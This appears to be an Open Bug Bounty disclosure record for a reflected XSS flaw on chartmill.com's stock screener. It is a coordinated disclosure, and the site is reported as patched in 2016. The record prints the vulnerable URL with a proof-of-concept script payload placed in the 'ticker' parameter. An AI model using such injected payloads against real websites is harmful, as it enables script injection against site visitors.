Lucene search

K
openbugbountyGeoffreyvdbOBB:83439
HistoryAug 30, 2015 - 9:26 p.m.

chartmill.com XSS vulnerability

2015-08-3021:26:00
geoffreyvdb
www.openbugbounty.org
9
Vulnerable URL:
http://chartmill.com/stockscreener.php?ticker=%3Cscript%3Ealert%28%22XSSPOSED%22%29%3C/script%3E
Details:
Description Value
Patched: Yes, at 30.01.2016
Latest check for patch: 30.01.2016 22:22 GMT
Vulnerability type: XSS
Vulnerability status: Publicly disclosed
Alexa Rank 964670
Google Pagerank 3
VIP website status: No
Check chartmill.com SSL connection: (Grade: F)
Coordinated Disclosure Timeline:
Description Value
Vulnerability reported 30 August, 2015 21:26 GMT
Vulnerability existence verified and confirmed 30 August, 2015 21:29 GMT
Vulnerability patched by the website owner 30 January, 2016 22:22 GMT